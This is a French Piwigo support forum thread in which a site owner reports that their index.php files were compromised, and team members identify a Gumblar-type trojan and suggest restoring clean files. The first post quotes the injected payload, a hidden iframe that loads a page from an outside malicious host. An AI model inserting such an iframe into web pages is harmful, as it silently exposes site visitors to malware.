•  » Installation
  •  » [Résolu] Piratage de mon site web / cherche solution pour sécuriser

#1 2009-06-21 12:07:39

musidora
Membre
2009-06-21
5

[Résolu] Piratage de mon site web / cherche solution pour sécuriser

Bonjour,

J'utilise Piwigo depuis 3 ans sans problème et depuis quelques jours, je me suis aperçu que l'on m'avais piraté mon site.
En effet, tous le fichiers index.php sont modifiés et contiennent se genre de truc :
<iframe src="http://catchynamestore.cn:8080/index.php" width=166 height=153 style="visibility: hidden"></iframe>

Depuis j'essaie de sécurisé mon site avec le fichier ".htaccess" mais apparemment chez free c'est très limité !

Avez vous une solution ?

Merci pour votre aide !

Hors ligne

#2 2009-06-21 13:14:26

nicolas
Former Piwigo Team
2004-12-30
1530

Re: [Résolu] Piratage de mon site web / cherche solution pour sécuriser

Il va falloir nous en dire plus. T'aider avec les infos que nous donne tient plus de la divination !
Qu'as-tu modifié par rapport à la version que tu utilises ? D'ailleurs laquelle tu utilises ? Peux-tu nous donner l'url de ta galerie ? En privé si tu préfères.


Donnez du peps à vos tags
Laissez vos visiteurs vous aidez à tagger vos images avec user_tags

Hors ligne

#3 2009-06-21 13:39:02

musidora
Membre
2009-06-21
5

Re: [Résolu] Piratage de mon site web / cherche solution pour sécuriser

nicolas a écrit:

Il va falloir nous en dire plus. T'aider avec les infos que nous donne tient plus de la divination !
Qu'as-tu modifié par rapport à la version que tu utilises ? D'ailleurs laquelle tu utilises ? Peux-tu nous donner l'url de ta galerie ? En privé si tu préfères.

J'utilise la dernière version la 2.0.2 et j'ai rien modifié.

Je viens de t'envoyer l'adresse de mon site par mail

Merci d'avance de ton aide

Dernière modification par musidora (2009-06-21 13:39:23)

Hors ligne

#4 2009-06-21 15:52:44

VDigital
Former Piwigo Team
Paris (FR)
2005-05-04
15124

Re: [Résolu] Piratage de mon site web / cherche solution pour sécuriser

Ce cas de figure est notre priorité N° 1.
Nicolas, si tu as besoin d'aide...


Vincent -« Plus vidéaste averti que photographe amateur... »
La galerie - Le blog   

Piwigo est une application libre de gestion de photos en ligne.

Hors ligne

#5 2009-06-21 20:22:38

nicolas
Former Piwigo Team
2004-12-30
1530

Re: [Résolu] Piratage de mon site web / cherche solution pour sécuriser

Le peu d'infos que tu donnes et l'url de ton site (où il n'y a qu'un message d'erreur) ne nous aide pas.


Donnez du peps à vos tags
Laissez vos visiteurs vous aidez à tagger vos images avec user_tags

Hors ligne

#6 2009-06-21 21:23:00

musidora
Membre
2009-06-21
5

Re: [Résolu] Piratage de mon site web / cherche solution pour sécuriser

nicolas a écrit:

Le peu d'infos que tu donnes et l'url de ton site (où il n'y a qu'un message d'erreur) ne nous aide pas.

Dis moi ce que tu veux et je te le donne ( les fichiers index.php modifiés ? )

Hors ligne

#7 2009-06-21 21:25:49

VDigital
Former Piwigo Team
Paris (FR)
2005-05-04
15124

Re: [Résolu] Piratage de mon site web / cherche solution pour sécuriser

Avant de dire que ton site a été piraté, je vais t'envoyer un MP car je ne comprends pas.


Vincent -« Plus vidéaste averti que photographe amateur... »
La galerie - Le blog   

Piwigo est une application libre de gestion de photos en ligne.

Hors ligne

#8 2009-06-21 23:00:56

VDigital
Former Piwigo Team
Paris (FR)
2005-05-04
15124

Re: [Résolu] Piratage de mon site web / cherche solution pour sécuriser

Le fichier index.php contenait 2 virus de type HTML/Frame.
Je n'avais jamais vu ça.

Cela reste à surveiller surtout sur les sites chez free.
Un simple transfert d'une version saine du fichier .php résout le pb.

musidora? [Résolu] ?

;-)


Vincent -« Plus vidéaste averti que photographe amateur... »
La galerie - Le blog   

Piwigo est une application libre de gestion de photos en ligne.

Hors ligne

#9 2009-06-22 00:03:03

Gotcha
Equipe Piwigo
Pierrelatte (26)
2007-03-14
13324

Re: [Résolu] Piratage de mon site web / cherche solution pour sécuriser

Et comment s'en prémunir ???


Ayez comme premier réflexe de consulter le wiki.
Ensuite, veuillez effectuer une recherche sur le forum avant de poser votre question.

LE FAIRE EST LE REVELATEUR DE L'ETRE

Hors ligne

#10 2009-06-22 00:09:58

VDigital
Former Piwigo Team
Paris (FR)
2005-05-04
15124

Re: [Résolu] Piratage de mon site web / cherche solution pour sécuriser

Cela n'arrive jamais.
C'est bien la première fois que je vois ça.

;-)


Vincent -« Plus vidéaste averti que photographe amateur... »
La galerie - Le blog   

Piwigo est une application libre de gestion de photos en ligne.

Hors ligne

#11 2009-06-22 00:36:07

Gotcha
Equipe Piwigo
Pierrelatte (26)
2007-03-14
13324

Re: [Résolu] Piratage de mon site web / cherche solution pour sécuriser

Il faut bien une première fois ^^
Bon bah si le problème vient de l'ordinateur du webmaster, c'est "rassurant".


Ayez comme premier réflexe de consulter le wiki.
Ensuite, veuillez effectuer une recherche sur le forum avant de poser votre question.

LE FAIRE EST LE REVELATEUR DE L'ETRE

Hors ligne

#12 2009-06-22 00:45:59

jpsol
Membre
2005-11-23
42

Re: [Résolu] Piratage de mon site web / cherche solution pour sécuriser

Un script en perl est susceptible de faire ce genre de travail mais les hébergeurs refusent ce langage je crois bien.
A savoir le genre de pluggin ou adon qui ont été chargé sur le site également ?
L'explication la plus plausible est une modif du fichier sur la machine du webmaster et l'upload d'un fichier vérolé.


Piwigo 2.0.2, Ploader 2.02c, thème Yoga/dark

Hors ligne

#13 2009-06-22 07:55:34

VDigital
Former Piwigo Team
Paris (FR)
2005-05-04
15124

Re: [Résolu] Piratage de mon site web / cherche solution pour sécuriser

jpsol a écrit:

Un script en perl est susceptible de faire ce genre de travail mais les hébergeurs refusent ce langage je crois bien.

Cela peut également venir de l'hébergeur.
Mais chez free, aucune ne ces hypothèses ne devraient tenir très longtemps...


Vincent -« Plus vidéaste averti que photographe amateur... »
La galerie - Le blog   

Piwigo est une application libre de gestion de photos en ligne.

Hors ligne

#14 2009-06-22 09:48:22

musidora
Membre
2009-06-21
5

Re: [Résolu] Piratage de mon site web / cherche solution pour sécuriser

Perso, je ne pense pas que cela vienne d'un virus de mon PC car quand je regarde les scripts php dans le package qui m'a servi à l'installation, je ne vois aucun virus.

Perso, je pense plutôt à une attaque du genre :
http://forum.ovh.com/showthread.php?t=19263

ou un hackage du password  de mon ftp (que je viens de changer)

J'ai essayé de sécurisé avec le fichier ".htaccess" mais chez free c'est très limité.

Encore merci pour votre aide

Dernière modification par musidora (2009-06-22 09:48:43)

Hors ligne

#15 2009-06-22 10:14:28

nicolas
Former Piwigo Team
2004-12-30
1530

Re: [Résolu] Piratage de mon site web / cherche solution pour sécuriser

jpsol a écrit:

Un script en perl est susceptible de faire ce genre de travail mais les hébergeurs refusent ce langage je crois bien.

Pourquoi ce serait plus facile en perl qu'avec php ? Aucun rapport.

L'hypothèse la plus plausible reste un virus sur son poste de travail qui a modifié le fichier index.php. Une autre hypothèse serait que son hébergement contient une autre application contenant une faille de sécurité qui a permis cet "exploit".

Edit: en fait c'est un cheval de troie, variante de Gumblar. Bon courage pour t'en débarrasser.

Dernière modification par nicolas (2009-06-22 10:28:35)


Donnez du peps à vos tags
Laissez vos visiteurs vous aidez à tagger vos images avec user_tags

Hors ligne

  •  » Installation
  •  » [Résolu] Piratage de mon site web / cherche solution pour sécuriser

Pied de page des forums

Propulsé par FluxBB

github twitter facebook newsletter Faire un don Piwigo.org © 2002-2019 · Contact